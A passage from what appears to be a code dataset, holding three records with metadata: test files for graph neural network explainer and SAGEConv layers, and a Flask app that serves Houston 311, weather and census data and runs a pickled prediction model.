1\n\n\n@pytest.mark.parametrize('model', [GCN(), GAT()])\ndef test_to_log_prob(model):\n raw_to_log = GNNExplainer(model, return_type='raw').__to_log_prob__\n prob_to_log = GNNExplainer(model, return_type='prob').__to_log_prob__\n log_to_log = GNNExplainer(model, return_type='log_prob').__to_log_prob__\n\n raw = torch.tensor([[1, 3.2, 6.1], [9, 9, 0.1]])\n prob = raw.softmax(dim=-1)\n log_prob = raw.log_softmax(dim=-1)\n\n assert torch.allclose(raw_to_log(raw), prob_to_log(prob))\n assert torch.allclose(prob_to_log(prob), log_to_log(log_prob))\n\n\ndef assert_edgemask_clear(model):\n for layer in model.modules():\n if isinstance(layer, MessagePassing):\n assert ~layer.__explain__\n assert layer.__edge_mask__ is None\n\n\nclass Net(torch.nn.Module):\n def __init__(self):\n super().__init__()\n self.conv1 = GCNConv(3, 16)\n self.conv2 = GCNConv(16, 16)\n self.fc1 = Sequential(Linear(16, 16), ReLU(), Dropout(0.2),\n Linear(16, 7))\n\n def forward(self, x, edge_index, batch, get_embedding=False):\n x = self.conv1(x, edge_index)\n x = F.relu(x)\n x = self.conv2(x, edge_index)\n if get_embedding:\n return x\n x = global_add_pool(x, batch)\n x = self.fc1(x)\n return x.log_softmax(dim=1)\n\n\n@pytest.mark.parametrize('model', [Net()])\ndef test_graph_explainer(model):\n x = torch.randn(8, 3)\n edge_index = torch.tensor([[0, 1, 1, 2, 2, 3, 4, 5, 5, 6, 6, 7],\n [1, 0, 2, 1, 3, 2, 5, 4, 6, 5, 7, 6]])\n\n explainer = GNNExplainer(model, log=False)\n\n node_feat_mask, edge_mask = explainer.explain_graph(x, edge_index)\n assert_edgemask_clear(model)\n _, _ = explainer.visualize_subgraph(-1, edge_index, edge_mask,\n y=torch.tensor(2), threshold=0.8)\n assert node_feat_mask.size() == (x.size(1), )\n assert node_feat_mask.min() >= 0 and node_feat_mask.max() <= 1\n assert edge_mask.shape[0] == edge_index.shape[1]\n assert edge_mask.max() <= 1 and edge_mask.min() >= 0\n", "sub_path": "test/nn/models/test_gnn_explainer.py", "file_name": "test_gnn_explainer.py", "file_ext": "py", "file_size_in_byte": 3724, "program_lang": "python", 
"lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "74", "api": [{"api_name": "torch.nn", "line_number": 9, "usage_type": "attribute"}, {"api_name": "torch_geometric.nn.GCNConv", "line_number": 12, "usage_type": "call"}, {"api_name": "torch_geometric.nn.GCNConv", "line_number": 13, "usage_type": "call"}, {"api_name": "torch.nn.functional.relu", "line_number": 17, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 17, "usage_type": "name"}, {"api_name": "torch.nn", "line_number": 22, "usage_type": "attribute"}, {"api_name": "torch_geometric.nn.GATConv", "line_number": 25, "usage_type": "call"}, {"api_name": "torch_geometric.nn.GATConv", "line_number": 26, "usage_type": "call"}, {"api_name": "torch.nn.functional.relu", "line_number": 30, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 30, "usage_type": "name"}, {"api_name": "torch_geometric.nn.GNNExplainer", "line_number": 37, "usage_type": "call"}, {"api_name": "torch.randn", "line_number": 40, "usage_type": "call"}, {"api_name": "torch.tensor", "line_number": 41, "usage_type": "call"}, {"api_name": "pytest.mark.parametrize", "line_number": 35, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 35, "usage_type": "attribute"}, {"api_name": "torch_geometric.nn.GNNExplainer", "line_number": 53, "usage_type": "call"}, {"api_name": "torch_geometric.nn.GNNExplainer", "line_number": 54, "usage_type": "call"}, {"api_name": "torch_geometric.nn.GNNExplainer", "line_number": 55, "usage_type": "call"}, {"api_name": "torch.tensor", "line_number": 57, "usage_type": "call"}, {"api_name": "torch.allclose", "line_number": 61, "usage_type": "call"}, {"api_name": "torch.allclose", "line_number": 62, "usage_type": "call"}, {"api_name": "pytest.mark.parametrize", "line_number": 51, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 51, "usage_type": "attribute"}, {"api_name": "torch_geometric.nn.MessagePassing", "line_number": 67, "usage_type": "argument"}, {"api_name": "torch.nn", "line_number": 72, "usage_type": "attribute"}, {"api_name": "torch_geometric.nn.GCNConv", "line_number": 75, "usage_type": "call"}, {"api_name": "torch_geometric.nn.GCNConv", "line_number": 76, "usage_type": "call"}, {"api_name": "torch.nn.Sequential", "line_number": 77, "usage_type": "call"}, {"api_name": "torch.nn.Linear", "line_number": 77, "usage_type": "call"}, {"api_name": "torch.nn.ReLU", "line_number": 77, "usage_type": "call"}, {"api_name": "torch.nn.Dropout", "line_number": 77, "usage_type": "call"}, {"api_name": "torch.nn.Linear", "line_number": 78, "usage_type": "call"}, {"api_name": "torch.nn.functional.relu", "line_number": 82, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 82, "usage_type": "name"}, {"api_name": "torch_geometric.nn.global_add_pool", "line_number": 86, "usage_type": "call"}, {"api_name": "torch.randn", "line_number": 93, "usage_type": "call"}, {"api_name": "torch.tensor", "line_number": 94, "usage_type": "call"}, {"api_name": "torch_geometric.nn.GNNExplainer", "line_number": 97, "usage_type": "call"}, {"api_name": "torch.tensor", "line_number": 102, "usage_type": "call"}, {"api_name": "pytest.mark.parametrize", "line_number": 91, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 91, "usage_type": "attribute"}]}
+{"seq_id": "35612235", "text": "import numpy as np\nfrom numpy.testing import assert_allclose, assert_array_almost_equal\nimport pytest\nimport torch\n\nfrom openff.utilities import requires_package\nfrom openff.nagl.nn.activation import ActivationFunction\nfrom openff.nagl.nn.gcn import SAGEConvStack\nfrom openff.nagl.nn.gcn._sage import SAGEConv\n\ntry:\n import dgl\n\n _BASE_SAGECONV_CLASS = dgl.nn.pytorch.SAGEConv\nexcept ImportError:\n _BASE_SAGECONV_CLASS = SAGEConv\n\n\nclass TestDGLSAGEConvStack:\n def test_default_with_layers(self):\n stack = SAGEConvStack.with_layers(\n n_input_features=1,\n hidden_feature_sizes=[2, 3],\n )\n stack.reset_parameters()\n\n assert len(stack) == 2\n assert all(isinstance(layer, _BASE_SAGECONV_CLASS) for layer in stack)\n\n first, second = stack\n assert np.isclose(first.feat_drop.p, 0.0)\n assert first.fc_self.in_features == 1\n assert first.fc_self.out_features == 2\n\n assert np.isclose(second.feat_drop.p, 0.0)\n assert second.fc_self.in_features == 2\n assert second.fc_self.out_features == 3\n\n def test_with_layers_inputs(self):\n stack = SAGEConvStack.with_layers(\n n_input_features=2,\n hidden_feature_sizes=[3],\n layer_activation_functions=[ActivationFunction.LeakyReLU],\n layer_dropout=[0.5],\n layer_aggregator_types=[\"lstm\"],\n )\n\n assert len(stack) == 1\n assert all(isinstance(layer, _BASE_SAGECONV_CLASS) for layer in stack)\n\n layer = stack[0]\n assert np.isclose(layer.feat_drop.p, 0.5)\n assert layer.lstm.input_size == 2\n assert layer.lstm.hidden_size == 2\n assert layer.fc_neigh.out_features == 3\n assert isinstance(layer.activation, torch.nn.LeakyReLU)\n\n def test_forward(self, dgl_methane):\n stack = SAGEConvStack.with_layers(\n n_input_features=4,\n hidden_feature_sizes=[2],\n )\n\n h = stack.forward(dgl_methane.homograph, dgl_methane.atom_features)\n assert h.detach().numpy().shape == (5, 2)\n\n def test_invalid_lengths(self):\n expected_err = (\n r\"`layer_dropout` \\(length 1\\) must be a list of same length \"\n r\"as `hidden_feature_sizes` \\(length 2\\).\"\n )\n with pytest.raises(ValueError, match=expected_err):\n SAGEConvStack.with_layers(\n n_input_features=1,\n hidden_feature_sizes=[2, 3],\n layer_dropout=[0.5],\n )\n\n\nclass TestDGLSageConv:\n def test_forward_values(self, dgl_methane):\n dgl = pytest.importorskip(\"dgl\")\n layer = dgl.nn.pytorch.SAGEConv(\n in_feats=4,\n out_feats=3,\n aggregator_type=\"mean\",\n feat_drop=0,\n activation=torch.nn.Sigmoid(),\n bias=False,\n )\n\n layer.fc_neigh.weight.data.fill_(1.0)\n layer.fc_self.weight.data.fill_(2.0)\n\n expected_features = np.array(\n [\n [0, 0, 0, 1],\n [1, 0, 0, 0],\n [1, 0, 0, 0],\n [1, 0, 0, 0],\n [1, 0, 0, 0],\n ]\n )\n assert_allclose(dgl_methane.atom_features.detach().numpy(), expected_features)\n\n results = layer.forward(dgl_methane.homograph, dgl_methane.atom_features)\n results = results.detach().numpy()\n assert results.shape == (5, 3)\n assert_array_almost_equal(results, 0.952574)\n\n\nclass TestSageConv:\n @pytest.fixture()\n def sageconv_layer(self):\n layer = SAGEConv(\n in_feats=4,\n out_feats=3,\n aggregator_type=\"mean\",\n feat_drop=0,\n activation=torch.nn.Sigmoid(),\n bias=False,\n )\n\n layer.fc_neigh.weight.data.fill_(1.0)\n layer.fc_self.weight.data.fill_(2.0)\n return layer\n\n def test_forward_values_dgl(self, sageconv_layer, dgl_methane):\n expected_features = np.array(\n [\n [0, 0, 0, 1],\n [1, 0, 0, 0],\n [1, 0, 0, 0],\n [1, 0, 0, 0],\n [1, 0, 0, 0],\n ]\n )\n assert_allclose(dgl_methane.atom_features.detach().numpy(), 
expected_features)\n\n        results = sageconv_layer.forward(\n            dgl_methane.homograph, dgl_methane.atom_features\n        )\n        results = results.detach().numpy()\n        assert results.shape == (5, 3)\n        assert_array_almost_equal(results, 0.952574)\n\n    def test_forward_values_nx(self, sageconv_layer, nx_methane):\n        expected_features = np.array(\n            [\n                [0, 0, 0, 1],\n                [1, 0, 0, 0],\n                [1, 0, 0, 0],\n                [1, 0, 0, 0],\n                [1, 0, 0, 0],\n            ]\n        )\n        assert_allclose(nx_methane.atom_features.detach().numpy(), expected_features)\n\n        results = sageconv_layer.forward(nx_methane.homograph, nx_methane.atom_features)\n        results = results.detach().numpy()\n        assert results.shape == (5, 3)\n        assert_array_almost_equal(results, 0.952574)\n", "sub_path": "openff/nagl/tests/nn/gcn/test_sage.py", "file_name": "test_sage.py", "file_ext": "py", "file_size_in_byte": 5123, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "dgl.nn", "line_number": 14, "usage_type": "attribute"}, {"api_name": "openff.nagl.nn.gcn._sage.SAGEConv", "line_number": 16, "usage_type": "name"}, {"api_name": "openff.nagl.nn.gcn.SAGEConvStack.with_layers", "line_number": 21, "usage_type": "call"}, {"api_name": "openff.nagl.nn.gcn.SAGEConvStack", "line_number": 21, "usage_type": "name"}, {"api_name": "numpy.isclose", "line_number": 31, "usage_type": "call"}, {"api_name": "numpy.isclose", "line_number": 35, "usage_type": "call"}, {"api_name": "openff.nagl.nn.gcn.SAGEConvStack.with_layers", "line_number": 40, "usage_type": "call"}, {"api_name": "openff.nagl.nn.gcn.SAGEConvStack", "line_number": 40, "usage_type": "name"}, {"api_name": "openff.nagl.nn.activation.ActivationFunction.LeakyReLU", "line_number": 43, "usage_type": "attribute"}, {"api_name": "openff.nagl.nn.activation.ActivationFunction", "line_number": 43, "usage_type": "name"}, {"api_name": "numpy.isclose", "line_number": 52, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 56, "usage_type": "attribute"}, {"api_name": "openff.nagl.nn.gcn.SAGEConvStack.with_layers", "line_number": 59, "usage_type": "call"}, {"api_name": "openff.nagl.nn.gcn.SAGEConvStack", "line_number": 59, "usage_type": "name"}, {"api_name": "pytest.raises", "line_number": 72, "usage_type": "call"}, {"api_name": "openff.nagl.nn.gcn.SAGEConvStack.with_layers", "line_number": 73, "usage_type": "call"}, {"api_name": "openff.nagl.nn.gcn.SAGEConvStack", "line_number": 73, "usage_type": "name"}, {"api_name": "pytest.importorskip", "line_number": 82, "usage_type": "call"}, {"api_name": "dgl.nn.pytorch.SAGEConv", "line_number": 83, "usage_type": "call"}, {"api_name": "dgl.nn", "line_number": 83, "usage_type": "attribute"}, {"api_name": "torch.nn.Sigmoid", "line_number": 88, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 88, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 95, "usage_type": "call"}, {"api_name": "numpy.testing.assert_allclose", "line_number": 104, "usage_type": "call"}, {"api_name": "numpy.testing.assert_array_almost_equal", "line_number": 109, "usage_type": "call"}, {"api_name": "openff.nagl.nn.gcn._sage.SAGEConv", "line_number": 115, "usage_type": "call"}, {"api_name": "torch.nn.Sigmoid", "line_number": 120, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 120, "usage_type": "attribute"}, {"api_name": "pytest.fixture", "line_number": 113, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 129, "usage_type": "call"}, {"api_name": "numpy.testing.assert_allclose", "line_number": 138, 
"usage_type": "call"}, {"api_name": "numpy.testing.assert_array_almost_equal", "line_number": 145, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 148, "usage_type": "call"}, {"api_name": "numpy.testing.assert_allclose", "line_number": 157, "usage_type": "call"}, {"api_name": "numpy.testing.assert_array_almost_equal", "line_number": 162, "usage_type": "call"}]}
+{"seq_id": "575702570", "text": "# Docs on session basics\n\nimport numpy as np\nimport pandas as pd\nimport os\nimport sys\nimport pickle\nfrom collections import OrderedDict\n\nfrom flask import Flask, jsonify\n#from flask_cors import CORS, cross_origin\n\n\n#################################################\n# read data from the csv files\n#################################################\n\n# print(pd.show_versions(), file=sys.stderr)\n# Save reference to the table\nweatherData = pd.read_csv(\"static/data/selected_weather_data_for_visual.csv\")\naggData = pd.read_csv(\"static/data/agg_hist_311_data.csv\")\ncensusData = pd.read_json(\"static/data/census_data.json\")\nweatherData['date_field_str'] = weatherData['date_field_str'].astype('str')\nweatherData['yr'] = weatherData['yr'].astype('str')\ncensusData['zipcode'] = censusData['Zipcode'].astype('str')\naggData['zipcode'] = aggData['zipcode'].astype('str')\naggData['yr'] = aggData['yr'].astype('str')\naggData['date_field_str'] = aggData['date_field_str'].astype('str')\n# aggData['date_field'] = aggData['date_field'].dt.date\n\n# month = dict(one='January',\n# two='February',\n# three='March',\n# four='April',\n# five='May',\n# six='June',\n# seven='July',\n# eight='August',\n# nine='September',\n# ten='October',\n# eleven='November',\n# twelve='December'\n# )\n# monthShort = dict(one='Jan',\n# two='Feb',\n# three='Mar',\n# four='Apr',\n# five='May',\n# six='Jun',\n# seven='Jul',\n# eight='Aug',\n# nine='Sep',\n# ten='Oct',\n# eleven='Nov',\n# twelve='Dec'\n# )\n\nmonths = ['Jan','Feb','Mar','Apr','May','Jun','Jul','Aug','Sep','Oct','Nov','Dec']\nmonthsDict = {'Jan': 1,'Feb' : 2,'Mar': 3,'Apr': 4,'May': 5,'Jun': 6,'Jul': 7,'Aug': 8,'Sep': 9,'Oct': 10,'Nov': 11,'Dec': 12}\n\n\nprint(censusData.head(5), file=sys.stderr)\nprint(aggData.head(5), file=sys.stderr)\n\n#################################################\n# Flask Setup\n#################################################\napp = Flask(__name__)\n#cors = CORS(app)\n#app.config['CORS_HEADERS'] = 'Content-Type'\n\n#################################################\n# Loaf Model\n#################################################\n\ndef load_model():\n global model\n with open('static/models/logistic_model.pkl', 'rb') as f:\n model = pickle.load(f)\n print(\"model loaded\")\n\n#################################################\n# Flask Routes\n#################################################\n\n\n@app.route('/', methods=['GET', 'POST'])\ndef index():\n if request.method == 'POST':\n input_data = request.form.to_dict()\n data = process_input(input_data)\n value = model.predict(data)\n return render_template('index.html', result=value)\n\n return render_template('index.html')\n\n@app.route(\"/api/v1.0/weather/date/\")\ndef stateData(date_filter):\n \"\"\"Return a list of all weather for the state\"\"\"\n\n # Query all passengers\n weather_sel = weatherData[weatherData['date_field_str'] == str(date_filter).strip()]\n print('data in filter:'+ str(date_filter), file=sys.stderr)\n # close the session to end the communication with the database\n # Convert list of tuples into normal list\n# all_names = list(np.ravel(results))\n all_data = []\n # for weather, index in weather_sel:\n for index, weather in weather_sel.iterrows():\n weather_dict = {}\n weather_dict[\"date\"] = weather['date_field']\n weather_dict[\"tempMax\"] = weather['tempMax']\n weather_dict[\"tempMin\"] = weather['tempMin']\n weather_dict[\"tempAvg\"] = weather['tempAvg']\n weather_dict[\"precipitation\"] = 
weather['precipitation']\n\n        all_data.append(weather_dict)\n\n    return jsonify(all_data)\n\n\n@app.route(\"/api/v1.0/weather/dateRange/<date_start>/<date_end>\")\ndef all_states(date_start, date_end):\n    \"\"\"Return weather data for the given date range\"\"\"\n\n    # Select weather rows within the requested date range\n    weather_sel = weatherData[weatherData['date_field_str'] >= date_start]\n    weather_sel = weather_sel[weather_sel['date_field_str'] <= date_end]\n\n    # close the session to end the communication with the database\n    # Convert list of tuples into normal list\n#    all_names = list(np.ravel(results))\n    all_data = []\n    # for weather, index in weather_sel:\n    for index, weather in weather_sel.iterrows():\n        weather_dict = {}\n        weather_dict[\"date\"] = weather['date_field']\n        weather_dict[\"tempMax\"] = weather['tempMax']\n        weather_dict[\"tempMin\"] = weather['tempMin']\n        weather_dict[\"tempAvg\"] = weather['tempAvg']\n        weather_dict[\"precipitation\"] = weather['precipitation']\n        all_data.append(weather_dict)\n\n    return jsonify(all_data)\n\n@app.route(\"/api/v1.0/census/zipcode/<zipcode_filter>\")\ndef zipCodeData(zipcode_filter):\n    \"\"\"Return census data for the given zip code\"\"\"\n\n    # Select the census row for the requested zip code\n    census_sel = censusData[censusData['zipcode'] == str(zipcode_filter).strip()]\n    print('data in filter:'+ str(zipcode_filter), file=sys.stderr)\n    # close the session to end the communication with the database\n    # Convert list of tuples into normal list\n#    all_names = list(np.ravel(results))\n    all_data = []\n    # for weather, index in weather_sel:\n    for index, census in census_sel.iterrows():\n        census_dict = {}\n        census_dict[\"zipcode\"] = census['zipcode']\n        census_dict[\"Population\"] = census['Population']\n        census_dict[\"MedianAge\"] = census['Median Age']\n        census_dict[\"HouseholdIncome\"] = census['Household Income']\n        census_dict[\"PerCapitaIncome\"] = census['Per Capita Income']\n        census_dict[\"PovertyRate\"] = census['Poverty Rate']\n        census_dict[\"TotalHouseholds\"] = census['Total Households']\n        census_dict[\"TotalOwnerOccupied\"] = census['Total Owner Occupied']\n        census_dict[\"PerOwnerOccupied\"] = census['% Owner Occupied']\n\n        all_data.append(census_dict)\n\n    return jsonify(all_data)\n\n@app.route(\"/api/v1.0/getAllZipCodes\")\ndef getAllZipCodes():\n    \"\"\"Return the list of all zip codes\"\"\"\n\n    allZips = aggData.zipcode.unique()\n\n    return jsonify(allZips.tolist())\n\n@app.route(\"/api/v1.0/getAllTypes\")\ndef getAllTypes():\n    \"\"\"Return the list of all service types\"\"\"\n\n    allServs = aggData.serv_type.unique()\n\n    return jsonify(allServs.tolist())\n\n@app.route(\"/api/v1.0/getAllDates\")\ndef getAllDates():\n    \"\"\"Return the list of all dates\"\"\"\n\n    allDates = aggData.date_field_str.unique()\n\n    return jsonify(allDates.tolist())\n\n\n@app.route(\"/api/v1.0/getAllNeib\")\ndef getAllNeib():\n    \"\"\"Return the list of all neighborhoods\"\"\"\n\n    allNeibs = aggData.neighborhood.unique()\n\n    return jsonify(allNeibs.tolist())\n\n\n\n@app.route(\"/api/v1.0/houston311/zipcode/date/type/<zipcode_filter>/<date_filter>/<type_filter>\")\ndef houston311byAll(zipcode_filter, date_filter, type_filter):\n    \"\"\"Return 311 records for the given zip code, date and service type\"\"\"\n\n    # Filter 311 records by zip code, date and service type\n    agg_sel = aggData[aggData['zipcode'] == str(zipcode_filter).strip()]\n    print('data in filter:'+ str(zipcode_filter), file=sys.stderr)\n    agg_sel = agg_sel[agg_sel['date_field_str'] == str(date_filter).strip()]\n    print('data in filter:'+ str(date_filter), file=sys.stderr)\n    agg_sel = agg_sel[agg_sel['serv_type'] == str(type_filter).strip()]\n    print('data in 
filter:'+ str(type_filter), file=sys.stderr)\n    # close the session to end the communication with the database\n    # Convert list of tuples into normal list\n#    all_names = list(np.ravel(results))\n    all_data = []\n    # for weather, index in weather_sel:\n    for index, census in agg_sel.iterrows():\n        census_dict = {}\n        census_dict[\"zipcode\"] = census['zipcode']\n        census_dict[\"Population\"] = census['Population']\n        census_dict[\"MedianAge\"] = census['Median Age']\n        census_dict[\"HouseholdIncome\"] = census['Household Income']\n        census_dict[\"PerCapitaIncome\"] = census['Per Capita Income']\n        census_dict[\"PovertyRate\"] = census['Poverty Rate']\n        census_dict[\"TotalHouseholds\"] = census['Total Households']\n        census_dict[\"TotalOwnerOccupied\"] = census['Total Owner Occupied']\n        census_dict[\"PerOwnerOccupied\"] = census['% Owner Occupied']\n\n        all_data.append(census_dict)\n\n    return jsonify(all_data)\n\n\n@app.route(\"/api/v1.0/houston311/top10Types\")\ndef houston311Top10():\n    \"\"\"Return the top 10 service types by issue count\"\"\"\n    aggTypes = aggData.groupby(['serv_type']).agg(\n        # Count issues for each group\n        count_issues=('serv_type', 'count')) \n    aggTypes.reset_index(inplace=True)\n    aggTypes.sort_values('count_issues',ascending=False,inplace=True)\n    aggTypes = aggTypes.head(10)\n    # close the session to end the communication with the database\n    # Convert list of tuples into normal list\n#    all_names = list(np.ravel(results))\n    all_data = []\n    # for weather, index in weather_sel:\n    for index, row in aggTypes.iterrows():\n        data_dict = {}\n        data_dict[\"serv_type\"] = row.serv_type\n        data_dict[\"count_issues\"] = row.count_issues\n\n        all_data.append(data_dict)\n\n    return jsonify(all_data)\n\n\n\n\n@app.route(\"/api/v1.0/houston311/ByMonth\")\ndef houston311top10ByMonth():\n    \"\"\"Return monthly issue counts with weather aggregates\"\"\"\n    aggTypes = aggData.groupby(['date_month']).agg(\n        # Count issues for each group\n        count_issues=('serv_type', 'count')) \n    weathAgg = weatherData.groupby(['date_month']).agg(\n        prec=('precipitation', 'sum'),\n        avg_max=('tempMax', 'mean'))\n\n    aggTypes.reset_index(inplace=True)\n    weathAgg.reset_index(inplace=True)\n    \n    # close the session to end the communication with the database\n    # Convert list of tuples into normal list\n#    all_names = list(np.ravel(results))\n    all_data = []\n    # for weather, index in weather_sel:\n    for index, row in aggTypes.iterrows():\n        data_dict = {}\n        data_dict[\"date_month\"] = row.date_month\n        data_dict[\"count_issues\"] = row.count_issues\n        for index1, row1 in weathAgg.iterrows():\n            if (row1.date_month == row.date_month):\n                data_dict[\"prec\"] = row1.prec\n                data_dict[\"avg_max\"] = row1.avg_max\n\n        all_data.append(data_dict)\n\n    return jsonify(all_data)\n\n\n@app.route(\"/api/v1.0/houston311/top10Types/zip/<zip_filter>/year/<year_filter>/neib/<neib_filter>/type/<type_filter>\")\ndef houston311Top10byZip(zip_filter, year_filter, neib_filter, type_filter):\n    \"\"\"Return the top 10 service types for the given filters\"\"\"\n    agg_sel = aggData\n    if (zip_filter != 'ALL'):\n        agg_sel = agg_sel[agg_sel['zipcode'] == str(zip_filter).strip()]\n    if (year_filter != 'ALL'):\n        agg_sel = agg_sel[agg_sel['yr'] == str(year_filter).strip()]\n    if (neib_filter != 'ALL'):\n        agg_sel = agg_sel[agg_sel['neighborhood'] == str(neib_filter).strip()]\n    if (type_filter != 'ALL'):\n        agg_sel = agg_sel[agg_sel['serv_type'] == str(type_filter).strip()]\n    print('data in filter:'+ str(zip_filter), file=sys.stderr)\n#    print('agg:'+ agg_sel.head(5), file=sys.stderr)\n    aggTypes = 
agg_sel.groupby(['serv_type']).agg(\n        # Count issues for each group\n        count_issues=('serv_type', 'count')) \n    aggTypes.reset_index(inplace=True)\n    aggTypes.sort_values('count_issues',ascending=False,inplace=True)\n    aggTypes = aggTypes.head(10)\n    # close the session to end the communication with the database\n    # Convert list of tuples into normal list\n#    all_names = list(np.ravel(results))\n    all_data = []\n    # for weather, index in weather_sel:\n    for index, row in aggTypes.iterrows():\n        data_dict = {}\n        data_dict[\"serv_type\"] = row.serv_type\n        data_dict[\"count_issues\"] = row.count_issues\n\n        all_data.append(data_dict)\n\n    return jsonify(all_data)\n\n\n\n@app.route(\"/api/v1.0/houston311/ByMonth/zip/<zip_filter>/year/<year_filter>/neib/<neib_filter>/type/<type_filter>\")\ndef houston311top10ByMonthZip(zip_filter, year_filter, neib_filter, type_filter):\n    \"\"\"Return monthly issue counts and weather aggregates for the given filters\"\"\"\n    agg_sel = aggData\n    if (zip_filter != 'ALL'):\n        agg_sel = agg_sel[agg_sel['zipcode'] == str(zip_filter).strip()]\n    if (year_filter != 'ALL'):\n        agg_sel = agg_sel[agg_sel['yr'] == str(year_filter).strip()]\n    if (neib_filter != 'ALL'):\n        agg_sel = agg_sel[agg_sel['neighborhood'] == str(neib_filter).strip()]\n    if (type_filter != 'ALL'):\n        agg_sel = agg_sel[agg_sel['serv_type'] == str(type_filter).strip()]\n\n    print('data in filter:'+ str(zip_filter), file=sys.stderr)\n    aggTypes = agg_sel.groupby(['date_month']).agg(\n        count_issues=('serv_type', 'count'),\n        time_taken=('avg_time', 'mean'),\n        overdue=('avg_overdue', 'mean'))\n    weath_sel = weatherData\n    if (year_filter != 'ALL'):\n        weath_sel = weatherData[weatherData['yr'] == str(year_filter).strip()]\n\n    weathAgg = weath_sel.groupby(['date_month']).agg(\n        prec=('precipitation', 'sum'),\n        avg_max=('tempMax', 'mean'))\n\n    aggTypes.reset_index(inplace=True)\n    weathAgg.reset_index(inplace=True)\n    # aggTypes.sort_values('count_issues',ascending=False,inplace=True)\n    # aggTypes = aggTypes.head(10)\n    # close the session to end the communication with the database\n    # Convert list of tuples into normal list\n#    all_names = list(np.ravel(results))\n    all_data = []\n    # for weather, index in weather_sel:\n    for index, row in aggTypes.iterrows():\n        data_dict = {}\n        data_dict[\"sort_key\"] = monthsDict[row.date_month]\n        data_dict[\"date_month\"] = row.date_month\n        data_dict[\"count_issues\"] = row.count_issues\n        data_dict[\"time_taken\"] = row.time_taken\n        data_dict[\"overdue\"] = row.overdue\n        for index1, row1 in weathAgg.iterrows():\n            if (row1.date_month == row.date_month):\n                data_dict[\"prec\"] = row1.prec\n                data_dict[\"avg_max\"] = row1.avg_max\n\n        all_data.append(data_dict)\n    #OrderedDict(sorted(all_data.items(),key =lambda x:months.index(x[0])))\n    all_data = sorted(all_data, key = lambda i: (i['sort_key'])) \n    return jsonify(all_data)\n\n@app.route(\"/api/v1.0/processModel/zip/<zip_filter>/temp/<temp_entered>/rain/<rain_entered>/type/<type_filter>\")\ndef processModel(zip_filter, temp_entered, rain_entered, type_filter):\n    \"\"\"Run the prediction model for the given zip code, weather and service type\"\"\"\n\n    census_sel = censusData[censusData['zipcode'] == str(zip_filter).strip()]\n    print('data in filter:'+ str(zip_filter), file=sys.stderr)\n    # close the session to end the communication with the database\n    # Convert list of tuples into normal list\n#    all_names = list(np.ravel(results))\n    all_data = []\n    data_dict = {}\n\n    for index, census in census_sel.iterrows():\n        population = census['Population']\n        MedianAge = census['Median Age']\n        HouseholdIncome = census['Household Income']\n        PovertyRate = census['Poverty Rate']\n        PerOwnerOccupied = census['% Owner 
Occupied']\n data_dict['MedianAge'] = census['Median Age']\n data_dict['HouseholdIncome'] = census['Household Income']\n data_dict[\"Population\"] = census['Population']\n data_dict[\"PerCapitaIncome\"] = census['Per Capita Income']\n data_dict[\"PovertyRate\"] = census['Poverty Rate']\n data_dict[\"TotalHouseholds\"] = census['Total Households']\n data_dict[\"TotalOwnerOccupied\"] = census['Total Owner Occupied']\n data_dict[\"PerOwnerOccupied\"] = census['% Owner Occupied']\n\n # weather_sel = weatherData[weatherData['date_field_str'] == str(date_selected).strip()]\n # print('data in filter:'+ str(date_selected), file=sys.stderr)\n # for index, weather in weather_sel.iterrows():\n # tempAvg = weather['tempAvg']\n # precipitation = weather['precipitation']\n\n contProb = 0\n if (type_filter == 'Container Problem'):\n contProb = 1\n drainProb = 0\n if (type_filter == 'Drainage'):\n drainProb = 1\n missedGarbProb = 0\n if (type_filter == 'Missed Garbage Pickup'):\n missedGarbProb = 1\n missedHeavyProb = 0\n if (type_filter == 'Missed Heavy Trash Pickup'):\n missedHeavyProb = 1\n missedRecProb = 0\n if (type_filter == 'Missed Recycling Pickup'):\n missedRecProb = 1\n nuisProb = 0\n if (type_filter == 'Nuisance On Property'):\n nuisProb = 1\n smwProb = 0\n if (type_filter == 'SWM Escalation'):\n smwProb = 1\n sewerProb = 0\n if (type_filter == 'Sewer Wasterwater'):\n sewerProb = 1\n stormProb = 0\n if (type_filter == 'Storm Debris Collection'):\n stormProb = 1\n streetCondProb = 0\n if (type_filter == 'Street Condition'):\n streetCondProb = 1\n streetHazardProb = 0\n if (type_filter == 'Street Hazard'):\n streetHazardProb = 1\n traficSignalProb = 0\n if (type_filter == 'Traffic Signal Maintenance'):\n traficSignalProb = 1\n trafficSignProb = 0\n if (type_filter == 'Traffic Sign'):\n trafficSignProb = 1\n waterLeakProb = 0\n if (type_filter == 'Water Leak'):\n waterLeakProb = 1\n waterServiceProb = 0\n if (type_filter == 'Water Service'):\n waterServiceProb = 1\n\n \n# Population, Median Age, Household Income, Poverty Rate, % Owner Occupied, tempAvg, precipAvg, Container Problem, Drainage,\n# Missed Garbage Pickup, Missed Heavy Trash Pickup, Missed Recycling Pickup, Nuisance On Property, SWM Escalation, \n# Sewer Wasterwater, Storm Debris Collection, Street Condition,\n# Street Hazard, Traffic Signal Maintenance, Traffic Sign, Water Leak, Water Service\n\n new_data = [[population, MedianAge, HouseholdIncome, \n PovertyRate, PerOwnerOccupied, float(temp_entered), float(rain_entered),\n contProb, drainProb, missedGarbProb, missedHeavyProb, \n missedRecProb, nuisProb, smwProb, sewerProb, \n stormProb, streetCondProb, streetHazardProb, traficSignalProb, \n trafficSignProb, waterLeakProb, waterServiceProb]]\n\n # new_data_scaled = X_scaler.transform(new_data)\n\n new_predict = model.predict(new_data)\n print(new_predict, file=sys.stderr)\n data_dict['Prediction'] = str(new_predict[0])\n all_data.append(data_dict)\n print(all_data, file=sys.stderr)\n\n #OrderedDict(sorted(all_data.items(),key =lambda x:months.index(x[0])))\n # all_data = sorted(all_data, key = lambda i: (i['sort_key'])) \n return 